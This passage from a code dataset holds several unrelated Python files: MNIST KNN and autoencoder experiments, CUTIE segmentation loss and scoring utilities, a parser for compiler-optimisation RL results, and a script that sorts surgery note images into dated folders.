plt.figure(figsize=(10, 7))\n all_map = sns.heatmap(df_cm, annot=True)\n\n fig = all_map.get_figure()\n fig.savefig(\"unseen_map.png\")\n test_words = [\n \"THE\",\n \"QUICK\",\n \"BROWN\",\n \"FOX\",\n \"JUMPED\",\n \"OVER\",\n \"LAZY\",\n \"DOG\",\n ]\n subject_1, subject_2, subject_3 = {}, {}, {}\n for w in test_words:\n word_1, word_2, word_3 = [], [], []\n for l in w:\n value = mapping[l]\n word_1.append(X_unseen[((value + 1) * 8) - 1])\n word_2.append(X_unseen[((value + 1) * 8 + 208) - 1])\n word_3.append(X_unseen[((value + 1) * 8 + 416) - 1])\n subject_1[w] = \"\".join([inv_map[j] for j in list(model.predict(word_1))])\n subject_2[w] = \"\".join([inv_map[j] for j in list(model.predict(word_2))])\n subject_3[w] = \"\".join([inv_map[j] for j in list(model.predict(word_3))])\n\n # check_words(subject_1)\n # check_words(subject_2)\n # check_words(subject_3)\n # for i in subject_1:\n # prediction =\n # print(\"\".join([inv_map[j] for j in list(prediction)]))\n # # print(spell.correction(\"\".join([inv_map[j] for j in list(model.predict(np.array(i)))])))\n # print(spell.candidates(\"\".join([inv_map[j] for j in list(prediction)])))\n # for i in subject_2:\n # prediction = model.predict(np.array(i))\n # print(\"\".join([inv_map[j] for j in list(prediction)]))\n # # print(spell.correction(\"\".join([inv_map[j] for j in list(model.predict(np.array(i)))])))\n # print(spell.candidates(\"\".join([inv_map[j] for j in list(prediction)])))\n # for i in subject_3:\n # prediction = model.predict(np.array(i))\n # print(\"\".join([inv_map[j] for j in list(prediction)]))\n # # print(spell.correction(\"\".join([inv_map[j] for j in list(model.predict(np.array(i)))])))\n # print(spell.candidates(\"\".join([inv_map[j] for j in list(prediction)])))\n\n\ndef check_words(subject):\n from spellchecker import SpellChecker\n\n spell = SpellChecker()\n\n for correct, prediction in subject.items():\n print(f\"{correct} - {prediction}\")\n before = 0\n\n for i, l in enumerate(prediction):\n if l == correct[i]:\n before += 1\n candidates = spell.candidates(prediction)\n after = 0\n if candidates:\n for word in candidates:\n if len(word) == len(prediction):\n # print(f\"Changing {prediction} to {word.upper()}\")\n prediction = word.upper()\n break\n\n for i, l in enumerate(prediction):\n if l == correct[i]:\n after += 1\n print(f\"{len(correct)} - {before} - {after} - {candidates}\")\n\n\nmain()\n","repo_name":"brucebeck95/Masters","sub_path":"full_process.py","file_name":"full_process.py","file_ext":"py","file_size_in_byte":13612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28619150573","text":"import numpy as np\nimport struct\nfrom array import array\nfrom os.path import join\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn import decomposition\nfrom scipy.spatial import Voronoi, voronoi_plot_2d\nimport torch\nfrom torch.autograd import grad\nimport torch.nn.functional as F\nimport matplotlib.patches as p\n\n# Setting up the path for the data files\nin_path = './archive'\ntrain_images = join(in_path, 'train-images-idx3-ubyte/train-images-idx3-ubyte')\ntrain_labels = join(in_path, 'train-labels-idx1-ubyte/train-labels-idx1-ubyte')\ntest_images = join(in_path, 't10k-images-idx3-ubyte/t10k-images-idx3-ubyte')\ntest_labels = join(in_path, 't10k-labels-idx1-ubyte/t10k-labels-idx1-ubyte')\n\n# Defining a class for loading and processing the MNIST dataset\nclass 
MnistDataloader(object):\n def __init__(self, training_images, training_labels, test_images, test_labels):\n self.training_images = training_images\n self.training_labels = training_labels\n self.test_images = test_images\n self.test_labels = test_labels\n \n def read_images_labels(self, images_filepath, labels_filepath): \n # Read and process label data\n labels = []\n with open(labels_filepath, 'rb') as file:\n magic, size = struct.unpack(\">II\", file.read(8))\n labels = array(\"B\", file.read())\n # Read and process image data \n with open(images_filepath, 'rb') as file:\n magic, size, rows, cols = struct.unpack(\">IIII\", file.read(16))\n image_data = array(\"B\", file.read()) \n images = []\n for i in range(size):\n images.append([0] * rows * cols)\n for i in range(size):\n img = np.array(image_data[i * rows * cols:(i + 1) * rows * cols])\n img = img.reshape(28, 28)\n images[i][:] = img\n \n return images, labels\n\n def load_data(self):\n # Load training and testing data\n x_train, y_train = self.read_images_labels(self.training_images, self.training_labels)\n x_test, y_test = self.read_images_labels(self.test_images, self.test_labels)\n return (x_train, y_train),(x_test, y_test)\n\n# Defining a class for the Autoencoder model\nclass AutoEncoder():\n def __init__(self, dims, activation_list=None):\n self.layers = len(dims)-1\n self.params = {}\n\n # Initializing weights and biases\n for l in range(self.layers):\n self.params[\"W\"+str(l+1)] = 0.01*torch.randn(dims[l], dims[l+1], requires_grad=True, dtype=torch.float32)\n self.params[\"b\"+str(l+1)] = torch.zeros((dims[l+1], 1), requires_grad=True, dtype=torch.float32)\n\n def forward(self, x):\n # Forward pass through the network layers\n x = torch.mm(self.params[\"W1\"].T, x.T) + self.params[\"b1\"]\n x = relu(x)\n x = torch.mm(self.params[\"W2\"].T, x) + self.params[\"b2\"]\n x = relu(x)\n x = torch.mm(self.params[\"W3\"].T, x) + self.params[\"b3\"]\n x = relu(x)\n x = torch.mm(self.params[\"W4\"].T, x) + self.params[\"b4\"]\n x = relu(x)\n x = torch.mm(self.params[\"W5\"].T, x) + self.params[\"b5\"]\n x = relu(x)\n x = torch.mm(self.params[\"W6\"].T, x) + self.params[\"b6\"]\n return x\n\n def test(self, x):\n # Test pass through a subset of network layers\n x = torch.mm(self.params[\"W1\"].T, x.T) + self.params[\"b1\"]\n x = relu(x)\n x = torch.mm(self.params[\"W2\"].T, x) + self.params[\"b2\"]\n x = relu(x)\n x = torch.mm(self.params[\"W3\"].T, x) + self.params[\"b3\"]\n return x\n\n# Defining the ReLU activation function\ndef relu(z):\n A = torch.clamp(z, min=0.0, max=float('inf'))\n return A\n\n# Function for training the model\ndef train(model, x, labels, epochs=20, l_rate=0.1, seed=1):\n cost = []\n torch.manual_seed(seed)\n\n for i in range(epochs):\n logits = model.forward(x)\n\n # Computing the loss and recording it\n loss = F.cross_entropy(logits.transpose(0, 1), labels.long()) # using Mean Squared Error (MSE) loss might not be suitable\n cost.append(loss.detach())\n\n # Logging loss every 5 epochs\n if not i % 5 == 0: # adjusted to every 5\n print('epoch: %02d | Loss: %.5f' % ((i + 1), loss.item()))\n\n # Calculating gradients and updating parameters(changed for code efficiency)\n gradients = grad(loss, list(model.params.values()), create_graph=True)\n with torch.no_grad():\n for j, param in enumerate(model.params.values()):\n param -= l_rate * gradients[j]\n return cost\n\n# Function to calculate the sum of diagonal elements in a confusion matrix\ndef getSum(cm):\n sum = 0\n for i in range(10):\n sum += cm[i][i]\n 
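    # the diagonal of a confusion matrix counts correct predictions, so this
    # total divided by the number of test samples gives the overall accuracy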
return sum\n\n# Function to split data into Voronoi cells\ndef voronoi_split(x, y):\n out = [[0, 0] for i in range(10)]\n count = [0 for i in range(10)]\n # Aggregating coordinates for each label\n for i in range(len(y)):\n out[y[i]][0] += x[y[i]][0]\n out[y[i]][1] += x[y[i]][1]\n count[y[i]] += 1\n # Averaging coordinates for each label\n for i in range(10):\n out[i][0] /= count[i]\n out[i][1] /= count[i]\n\n return out\n\n########## Begin Main Script ##########\n# Loading the MNIST dataset\nmndl = MnistDataloader(train_images, train_labels, test_images, test_labels)\n(x_train, y_train), (x_test, y_test) = mndl.load_data()\n\n# Preprocessing the dataset\nx_train = np.array(x_train)\ny_train = np.array(y_train)\nx_test = np.array(x_test)\ny_test = np.array(y_test)\n\nx_train = x_train.reshape(60000, 784)\nx_test = x_test.reshape(10000, 784)\n\n# Training and evaluating a K-Nearest Neighbors Classifier\nknn = KNeighborsClassifier(n_neighbors=10) # tried lower values for n_neighbors\nknn.fit(x_train, y_train)\n\n# Predicting and evaluating the KNN model\npred_y = knn.predict(x_test)\ncm = confusion_matrix(y_test, pred_y)\ns = getSum(cm)\nprint(\"Accuracy: \", s/10000)\n\n# Visualizing the confusion matrix\nplt.imshow(cm, cmap = 'inferno', interpolation='nearest')\nplt.xlabel('preds')\nplt.ylabel('vals')\nplt.show()\nplt.clf()\n\n# Exploring different dimensions for PCA\ndimensions = [1, 10, 20, 50, 100]\npca = decomposition.PCA()\npca.n_components = 2\npca_transform = pca.fit_transform(x_test)\npca_train = pca.fit_transform(x_train)\nplot = voronoi_split(pca_train, y_train)\nv = Voronoi(plot)\nfig = voronoi_plot_2d(v)\n\n# Visualizing data points in PCA-transformed space\npoint_list = [[], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], []]\nc_list = ['red', 'orange', 'yellow', 'green', 'blue', 'purple', 'pink', 'olive', 'black', 'cyan']\nfor i in range(0, len(y_test), 10):\n point_list[2*y_test[i]].append(pca_transform[i][0])\n point_list[2*y_test[i]+1].append(pca_transform[i][1])\n\nfor i in range(0, 10):\n plt.scatter(point_list[2*i], point_list[2*i+1], color=c_list[i], label=i)\n\nplt.legend()\nplt.show()\nplt.clf()\n\n# Repeating KNN classification with different PCA dimensions\npca.n_components = 2\npca_transform = pca.fit_transform(x_train)\npca_test = pca.fit_transform(x_test)\n\n# Looping through different dimensions for KNN classification\nfor i in range(len(dimensions)):\n knn = KNeighborsClassifier(n_neighbors=dimensions[i])\n knn.fit(pca_transform, y_train)\n pred_y = knn.predict(pca_test)\n cm = confusion_matrix(y_test, pred_y)\n s = getSum(cm)\n print(\"Accuracy[\", dimensions[i],\"]: \", s/10000)\n\n # Plotting and displaying the confusion matrix\n plt.imshow(cm, cmap = 'inferno', interpolation='nearest')\n plt.xlabel('preds')\n plt.ylabel('vals')\n plt.show()\n plt.clf()\n\n# Converting datasets to tensors for PyTorch \ny_aux = y_train\nx_train = torch.tensor(x_train, dtype=torch.float32)\ny_train = torch.tensor(y_train, dtype=torch.float32)\nx_test = torch.tensor(x_test, dtype=torch.float32)\ny_test = torch.tensor(y_test, dtype=torch.float32)\n\n# Setting seed and training parameters for the AutoEncoder\nseed = 1\ntorch.manual_seed(seed)\nepochs = 500\nl_rate = 0.05\n\n# Dimensions for the AutoEncoder layers\ndims = [784, 300, 100, 2, 100, 300, 10] # output layer with dimmension of 10\n\n# Initializing AutoEncoder model\nmodel = AutoEncoder(dims)\ncost = train(model, x_train, y_train)\n\n# Testing the AutoEncoder model and converting outputs 
to numpy arrays\nae_dataset_test = model.test(x_test).detach().numpy()\nae_dataset_train = model.test(x_train).detach().numpy()\n\n# Creating Voronoi plots for the AutoEncoder's output\nplot = voronoi_split(ae_dataset_train.T, y_aux)\nv = Voronoi(plot)\nv = voronoi_plot_2d(v)\n\n# Preparing data for scatter plot\npoint_list = [[], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], []]\nc_list = ['red', 'orange', 'yellow', 'green', 'blue', 'purple', 'pink', 'olive', 'black', 'cyan']\n\n# Plotting each point in the AutoEncoder's test dataset\nfor i in range(0, len(y_test), 10):\n point_list[2*y_aux[i]].append(ae_dataset_test[0][i])\n point_list[2*y_aux[i]+1].append(ae_dataset_test[1][i])\n\n# Scatter plot of the AutoEncoder's output\nfor i in range(0, 10):\n plt.scatter(point_list[2*i], point_list[2*i+1], color=c_list[i], label=i)\n\nplt.legend()\nplt.show()\nplt.clf()\n\n# Repeating KNN classification with AutoEncoder output\nfor i in range(len(dimensions)):\n knn = KNeighborsClassifier(n_neighbors=dimensions[i])\n knn.fit(ae_dataset_train.T, y_train)\n pred_y = knn.predict(ae_dataset_test.T)\n\n cm = confusion_matrix(y_test, pred_y)\n s = getSum(cm)\n print(\"Accuracy[\", dimensions[i],\"]: \", s/10000)\n\n # Plotting and displaying the confusion matrix\n plt.imshow(cm, cmap = 'inferno', interpolation='nearest')\n plt.xlabel('preds')\n plt.ylabel('vals')\n plt.show()\n plt.clf()\n","repo_name":"tSigler2/machineLearningProject","sub_path":"knn_MNIST.py","file_name":"knn_MNIST.py","file_ext":"py","file_size_in_byte":9803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8833243016","text":"import os\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport typing\nfrom gensim.models import Word2Vec\nimport csv\nfrom tools.cutie.preprocessing import convert_json_to_tensors\n\nclass FocalTverskyLoss(nn.Module):\n \"\"\"\n Pytorch implementation of the FocalTversky Loss function\n \"\"\"\n def __init__(self, smooth=1, alpha=0.5, beta=0.5, gamma=1):\n super(FocalTverskyLoss, self).__init__()\n self.smooth = smooth\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n\n def forward(self, inputs, targets):\n \n #comment out if your model contains a sigmoid or equivalent activation layer\n #inputs = F.sigmoid(inputs) \n \n #flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n \n #True Positives, False Positives & False Negatives\n TP = (inputs * targets).sum() \n FP = ((1-targets) * inputs).sum()\n FN = (targets * (1-inputs)).sum()\n \n Tversky = (TP + self.smooth) / (TP + self.alpha*FP + self.beta*FN + self.smooth) \n FocalTversky = (1 - Tversky)**self.gamma\n \n return FocalTversky\n\nclass TverskyLoss(nn.Module):\n \"\"\"\n Pytorch implementation of the Tversky Loss function\n \"\"\"\n def __init__(self, smooth=1, alpha=0.5, beta=0.5):\n super(TverskyLoss, self).__init__()\n self.smooth = smooth\n self.alpha = alpha\n self.beta = beta\n\n def forward(self, inputs, targets):\n \n #comment out if your model contains a sigmoid or equivalent activation layer\n #inputs = F.sigmoid(inputs) \n \n #flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n \n #True Positives, False Positives & False Negatives\n TP = (inputs * targets).sum() \n FP = ((1-targets) * inputs).sum()\n FN = (targets * (1-inputs)).sum()\n \n Tversky = (TP + self.smoothth) / (TP + self.alpha*FP + self.beta*FN + self.smooth) \n \n 
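        # Tversky index: TI = (TP + s) / (TP + alpha*FP + beta*FN + s); with
        # alpha = beta = 0.5 it reduces to the Dice coefficient, so the value
        # returned below (1 - TI) behaves like a Dice loss by default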
return 1 - Tversky\n\nclass FocalLoss(nn.Module):\n \"\"\"\n Pytorch implementation of the Focal Loss function\n \"\"\"\n def __init__(self, alpha=0.8, gamma=2):\n super(FocalLoss, self).__init__()\n self.alpha = alpha\n self.gamma = gamma\n\n def forward(self, inputs, targets):\n \n #comment out if your model contains a sigmoid or equivalent activation layer\n #inputs = F.sigmoid(inputs) \n \n #flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n \n #first compute binary cross-entropy \n BCE = F.binary_cross_entropy(inputs, targets, reduction='mean')\n BCE_EXP = torch.exp(-BCE)\n focal_loss = self.alpha * (1-BCE_EXP)**self.gamma * BCE\n \n return focal_loss\n\nclass CutieDataset(torch.utils.data.Dataset):\n \"\"\"\n Dataset class for cutie model training\n \"\"\"\n def __init__(self, root, embedding_fun: typing.Callable, grid_size: int = 64, embedding_size: int = 128, N_class: int = 5):\n self.root = root\n self.files = [os.path.join(root,file) for file in os.listdir(root) if file.endswith('.json')]\n self.embedding = embedding_fun\n self.grid_size = grid_size\n self.embedding_size = embedding_size\n self.N_class = N_class\n\n def __getitem__(self, index):\n \n grid_tensor, classes_tensor = convert_json_to_tensors(self.files[index], embedding_fun = self.embedding, grid_size = self.grid_size, embedding_size = self.embedding_size, N_class = self.N_class)\n \n return grid_tensor, classes_tensor\n \n def __len__(self):\n return len(self.files)\n\nclass word2vec_embedding():\n \"\"\"\n Word2vec embedding class for cutie model training experimentation\n \"\"\"\n def __init__(self, vocab, embedding_size):\n self.vocab = vocab\n self.embedding_size = embedding_size\n def embed(self, text):\n w2v = Word2Vec(sentences=self.vocab, vector_size=self.embedding_size, window=3, min_count=1, workers=4)\n if text not in w2v.wv.key_to_index.keys():\n w2v.build_vocab([[text]], update=True)\n w2v.train([[text]], total_examples=1, epochs =2)\n vector = torch.tensor(w2v.wv[text])\n return vector\n\ndef init_stats(N_class: int) -> dict:\n \"\"\"\n Initialize a dictionary to store cutie model training or validation statistics\n \n :param N_class: Number of classes to predict\n :type N_class: int\n :return: dictionary to store the statistics\n :rtype: dict\n \"\"\"\n stats = {'TP':{},'TN':{},'FP':{},'FN':{},'softAP':{},'AP':{},'running_loss':0}\n for class_id in range(N_class):\n for key in stats.keys():\n if key != 'running_loss':\n stats[key][class_id] = 0\n return stats\n\ndef init_scores(N_class: int) -> dict:\n \"\"\"\n Initialize a dictionary to store cutie model training or validation scores\n \n :param N_class: Number of classes to predict\n :type N_class: int\n :return: dictionary to store the scores\n :rtype: dict\n \"\"\"\n scores = {'Acc':{},'Prec':{},'Rec':{},'F1':{},'softAP':{},'AP':{},'loss':0}\n for class_id in range(N_class):\n for key in scores.keys():\n if key != 'loss':\n scores[key][class_id] = 0\n return scores\n\ndef save_stats(stats: dict, N_class: int, output: torch.tensor, target: torch.tensor, loss: torch.tensor):\n \"\"\"\n Calculates and saves the statistics after each batch during cutie training or validation.\n \n :param stats: Dictionnary storing the training or validation statistics\n :type stats: dict\n :param N_class: Number of classes to predict\n :type N_class: int\n :param output: output predictions of the model\n :type output: torch.tensor\n :param target: Ground truth classes\n :type target: torch.tensor\n :param loss: Loss 
calculated on the current batch\n :type loss: torch.tensor\n \"\"\"\n with torch.no_grad():\n for class_id in range(N_class):\n TP_tensor = ((output.data.max(1)[1] == class_id) * target[:,class_id,:])\n TN_tensor = ((output.data.max(1)[1] != class_id) * (1-target[:,class_id,:]))\n FP_tensor = ((output.data.max(1)[1] == class_id) * (1-target[:,class_id,:]))\n FN_tensor = ((output.data.max(1)[1] != class_id) * target[:,class_id,:])\n stats['TP'][class_id] += torch.sum(TP_tensor).item() \n stats['TN'][class_id] += torch.sum(TN_tensor).item()\n stats['FP'][class_id] += torch.sum(FP_tensor).item()\n stats['FN'][class_id] += torch.sum(FN_tensor).item()\n stats['softAP'][class_id] += torch.sum(torch.sum(FN_tensor,dim=1) == 0).item()\n stats['AP'][class_id] += torch.sum((torch.sum(FN_tensor,dim=1) == 0) * (torch.sum(FP_tensor,dim=1) == 0)).item()\n stats['running_loss'] += loss.item()\n\ndef save_scores(scores: dict, stats: dict, dataloader :typing.Callable, N_class: int):\n \"\"\"\n Calculates and saves the scores after each epoch during cutie training\n \n :param scores: Dictionnary storing the training or validation scores\n :type scores: dict\n :param stats: Dictionnary storing the training or validation statistics\n :type stats: dict\n :param dataloader: Dataloader function used to train or validate the model\n :type dataloader: torch.tensor\n :param N_class: Number of classes to predict\n :type N_class: int\n \"\"\"\n with torch.no_grad():\n for class_id in range(N_class):\n TN = stats['TN'][class_id]\n TP = stats['TP'][class_id]\n FN = stats['FN'][class_id]\n FP = stats['FP'][class_id]\n scores['softAP'][class_id] = stats['softAP'][class_id] / (dataloader.batch_size * len(dataloader))\n scores['softAP'][class_id] = round(scores['softAP'][class_id],3)\n scores['AP'][class_id] = stats['AP'][class_id] / (dataloader.batch_size * len(dataloader))\n scores['AP'][class_id] = round(scores['AP'][class_id],3)\n if (TN + TP + FN + FP) != 0:\n scores['Acc'][class_id] = round((TN + TP) / (TN + TP + FN + FP),3)\n else:\n scores['Acc'][class_id] = 0\n if (TP + FP) != 0:\n scores['Prec'][class_id] = round(TP / (TP + FP),3)\n else:\n scores['Prec'][class_id] = 0\n if (TP + FN) != 0:\n scores['Rec'][class_id] = round(TP / (TP + FN),3)\n else:\n scores['Rec'][class_id] = 0\n if (scores['Prec'][class_id] + scores['Rec'][class_id]) != 0:\n scores['F1'][class_id] = 2 * (scores['Prec'][class_id] * scores['Rec'][class_id]) / (scores['Prec'][class_id] + scores['Rec'][class_id])\n scores['F1'][class_id] = round(scores['F1'][class_id],3) \n else:\n scores['F1'][class_id] = 0\n scores['loss'] = round(stats['running_loss'] / len(dataloader),5)\n\ndef write_scores(scores: dict, epoch: int, N_class: int, file_path: str):\n \"\"\"\n Append the scores to a csv file after each epoch during cutie training\n \n :param scores: Dictionnary storing the training or validation scores\n :type scores: dict\n :param epoch: Current epoch of the training\n :type epoch: int\n :param N_class: Number of classes to predict\n :type N_class: int\n :param file_path: Path to the output file\n :type file_path: str\n \"\"\"\n if not os.path.isfile(file_path):\n open(file_path,'w').close()\n \n filesize = os.path.getsize(file_path)\n if filesize == 0:\n headers = ['epoch','loss']\n for topic in ['AP','softAP','Acc','Prec','Rec','F1']:\n for class_id in range(N_class):\n headers.append(f'{topic}_{class_id}')\n with open(file_path, 'w',newline='') as outfile:\n writer = csv.writer(outfile, delimiter='|')\n writer.writerow(headers)\n \n new_line = 
[epoch,scores[\"loss\"]]\n for topic in ['AP','softAP','Acc','Prec','Rec','F1']:\n for class_id in range(N_class):\n new_line.append(scores[topic][class_id])\n with open(file_path, 'a',newline='') as outfile:\n writer = csv.writer(outfile, delimiter='|')\n writer.writerow(new_line)\n\n\n\n\n","repo_name":"assansanogo/Opteeq","sub_path":"cutie/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1688264073","text":"import csv\nimport statistics\n\nos_FILE = \"../RL/res/Base_Result_-os.csv\"\no3_FILE = \"../RL/res/Base_Result_-o3.csv\"\nRESULT_FILE_LIST = [\n \"../RL/res/RL_Result_PPO_os.csv\",\n \"../RL/res/RL_Cluster_Result_PPO_os.csv\",\n \"../RL/res/RL_Result_A3C_os.csv\",\n \"../RL/res/RL_Cluster_Result_A3C_os.csv\",\n \"../RL/res/RL_Result_PG_os.csv\",\n \"../RL/res/RL_Cluster_Result_PG_os.csv\",\n \"../RL/res/RL_Result_PPO_PG_A3C_os.csv\",\n \"../RL/res/RL_Cluster_Result_PPO_PG_A3C_os.csv\",\n]\n\nraw_total_memory_list = []\nraw_total_time_list = []\n\nos_total_memory_list = []\nos_memory_reduction_list = []\nos_total_time_list = []\nos_time_reduction_list = []\n\nmemory_percent_result = []\nmemory_value_result = []\ntime_percent_result = []\ntime_value_result = []\nwith open(os_FILE, newline='') as f:\n reader = csv.reader(f)\n base_data = list(reader)\n del base_data[0]\n base_data = [list(map(float, lst)) for lst in base_data]\n\n for item in base_data:\n os_total_memory_list.append(int(item[0]))\n os_memory_reduction_list.append(int(item[1]))\n os_total_time_list.append(item[2])\n os_time_reduction_list.append(item[3])\n raw_total_memory_list.append(int(item[4]))\n raw_total_time_list.append(item[5])\n\n base_memory_reduction_percent_list = []\n for idx in range(len(os_memory_reduction_list)):\n diff = (os_memory_reduction_list[idx] / raw_total_memory_list[idx]) * 100\n base_memory_reduction_percent_list.append(diff)\n base_time_reduction_percent_list = []\n for idx in range(len(os_time_reduction_list)):\n diff = (os_time_reduction_list[idx] / raw_total_time_list[idx]) * 100\n base_time_reduction_percent_list.append(diff)\n\nmemory_percent_result.append(base_memory_reduction_percent_list)\nmemory_value_result.append(os_memory_reduction_list)\ntime_percent_result.append(base_time_reduction_percent_list)\ntime_value_result.append(os_total_time_list)\n\no3_total_memory_list = []\no3_memory_reduction_list = []\no3_total_time_list = []\no3_time_reduction_list = []\n\nwith open(o3_FILE, newline='') as f:\n reader = csv.reader(f)\n base_data = list(reader)\n del base_data[0]\n base_data = [list(map(float, lst)) for lst in base_data]\n\n for item in base_data:\n o3_total_memory_list.append(int(item[0]))\n o3_memory_reduction_list.append(int(item[1]))\n o3_total_time_list.append(item[2])\n o3_time_reduction_list.append(item[3])\n\nfor result_file in RESULT_FILE_LIST:\n print(\"Processing \", result_file)\n with open(result_file, newline='') as f:\n reader = csv.reader(f)\n data = list(reader)\n del data[0]\n data = [list(map(float, lst)) for lst in data]\n\n memory_reduction_list = []\n for idx in range(len(data)):\n memory_value = int(-data[idx][0]/100)+os_total_memory_list[idx]\n diff = -(memory_value-raw_total_memory_list[idx])\n memory_reduction_list.append(diff)\n memory_reduction_precent_list = []\n for idx in range(len(memory_reduction_list)):\n diff = (memory_reduction_list[idx] / raw_total_memory_list[idx]) * 100\n 
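        # express each benchmark's absolute reduction as a percentage of its
        # unoptimized (raw) memory footprint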
memory_reduction_precent_list.append(diff)\n memory_percent_result.append(memory_reduction_precent_list)\n memory_value_result.append(memory_reduction_list)\n\n time_reduction_list = []\n time_list = []\n for idx in range(len(data)):\n time_value = data[idx][2]*os_total_time_list[idx]/100+os_total_time_list[idx]\n diff = -(time_value-raw_total_time_list[idx])\n time_reduction_list.append(diff)\n time_list.append(time_value)\n time_reduction_percent_list = []\n for idx in range(len(time_reduction_list)):\n diff = (time_reduction_list[idx] / raw_total_time_list[idx]) * 100\n time_reduction_percent_list.append(diff)\n time_percent_result.append(time_reduction_percent_list)\n time_value_result.append(time_list)\n \nprint(\"\\nMemory Average\")\nmemory_average_percent = list(map(statistics.mean, memory_percent_result))\nmemory_average_value = list(map(statistics.mean, memory_value_result))\nprint(\"-os Memory reduced (byte)\", memory_average_value[0])\nfor idx in range(1, len(memory_average_percent)):\n print(RESULT_FILE_LIST[idx-1].split('/')[3], \"Memory reduced (byte)\", memory_average_value[idx])\n print(RESULT_FILE_LIST[idx-1].split('/')[3], \"Improve compare to -os: \", \n round((memory_average_value[idx]-memory_average_value[0])/memory_average_value[0]*100, 3), \"%\")\n\nprint(\"\\nTime Average\")\ntime_average_percent = list(map(statistics.mean, time_percent_result))\ntime_average_value = list(map(statistics.mean, time_value_result))\nprint(\"-os Time (ms)\", time_average_value[0]*1000)\nfor idx in range(1, len(time_average_percent)):\n print(RESULT_FILE_LIST[idx-1].split('/')[3], \"Time (ms)\", time_average_value[idx]*1000)\n print(RESULT_FILE_LIST[idx-1].split('/')[3], \"Improve compare to -os: \", \n round((time_average_value[idx]-time_average_value[0])/time_average_value[0]*100, 3), \"%\")\n\nmemory_percent_result = list(map(list, zip(*memory_percent_result)))\nwith open(\"./Memory_Result.csv\", \"w\") as f:\n writer = csv.writer(f)\n writer.writerow([os_FILE] + RESULT_FILE_LIST)\n for idx in range(1, len(memory_percent_result)):\n writer.writerow(memory_percent_result[idx])","repo_name":"jschang0215/RL-TransformPass-Optimization","sub_path":"Experiment_Result/Parse_Data.py","file_name":"Parse_Data.py","file_ext":"py","file_size_in_byte":5259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"23966655630","text":"import pandas as pd\nimport os\nimport re\nimport datetime\nimport shutil\nfrom fuzzywuzzy import process\nimport datetime\nimport dateparser\n\ndef create_date_dir_move_file(source_path, destination_path, suffix, start_dt):\n files = os.listdir(source_path)\n for file in files:\n if file.endswith(suffix):\n match = re.search('\\d{4}-\\d{2}-\\d{2}', file)\n dt = datetime.datetime.strptime(match.group(), '%Y-%m-%d').date()\n start_date = datetime.datetime.strptime(start_dt, '%Y-%m-%d').date()\n if dt > start_date:\n dt_path = os.path.join(destination_path, str(dt))\n if not os.path.isdir(dt_path):\n os.mkdir(dt_path)\n if not os.path.isfile(os.path.join(dt_path, file)):\n shutil.move(os.path.join(source_path, file), dt_path)\n\nsource_path = 'D:/Shweta/ot_notes/2022_02_21_ot/2022_02_21_all'\ndestination_path = 'D:/Shweta/ot_notes/2022_02_21_ot/2022_02_21_datewise'\n\ncreate_date_dir_move_file(source_path, destination_path, suffix = '.jpg', start_dt = '2021-08-02')\n\n##\ndef find_date(sx_df, dt_str = 'Sx Date'):\n dts = []\n for sx_dt in sx_df[dt_str]:\n match = re.search('\\d{4}-\\d{2}-\\d{2}', str(sx_dt))\n if 
match is not None:\n            dt = datetime.datetime.strptime(match.group(), '%Y-%m-%d').date()\n            dts.append(str(dt))\n        else:\n            dts.append(sx_dt)\n    return dts\n\ndef convert_all_dates_into_one_format(dates):\n    dts = []\n    for date in dates:\n        dt_find = dateparser.parse(str(date))\n        match = re.search('\\d{4}-\\d{2}-\\d{2}', str(dt_find))\n        if match is not None:\n            dts.append(match[0])\n        else:\n            dts.append(date)\n    return dts\n\ndef match_the_dates(path, sx_df, sx_images_dts, dt_str = 'Sx Date', sx_name_str = 'Name '):\n    sx_dates = find_date(sx_df, dt_str)\n    all_dates = convert_all_dates_into_one_format(sx_dates)\n    sx_df['cleaned_sx_dates'] = all_dates\n    for sx_image_dt in sx_images_dts:\n        matched_dates = process.extractBests(query=sx_image_dt, choices=all_dates, score_cutoff=100)\n        print(matched_dates)\n        if matched_dates is not None:\n            dt_gr = sx_df.groupby('cleaned_sx_dates')\n            # the four copy-pasted branches for 1-4 matched dates collapsed into one equivalent branch\n            if 1 <= len(matched_dates) <= 4:\n                matched_dt_gr = dt_gr.get_group(matched_dates[0][0])\n                names = matched_dt_gr[sx_name_str]\n                new_name = '_'.join([sx_image_dt] + [names.iloc[i] for i in range(len(matched_dates))])\n                source = os.path.join(path, sx_image_dt)\n                destination = os.path.join(path, new_name)\n                os.rename(source, destination)\n\nsx_images_dts = os.listdir(destination_path)\nsx_df = pd.read_excel('D:\\\\Shweta\\\\Surgery\\\\2022_02_22_surgery_master_list_sk.xlsx')\nmatch_the_dates(destination_path, sx_df, sx_images_dts, dt_str = 'surgery_date', sx_name_str = 'patient_name')\n\n## classifying the ot data by patient names and adding the file_number into the folder\n\nfolder_path = 'D:/Shweta/ot_notes/all_ot_notes'\n\n\n","repo_name":"shwetakadupccm/file_management","sub_path":"ot_forms_management.py","file_name":"ot_forms_management.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
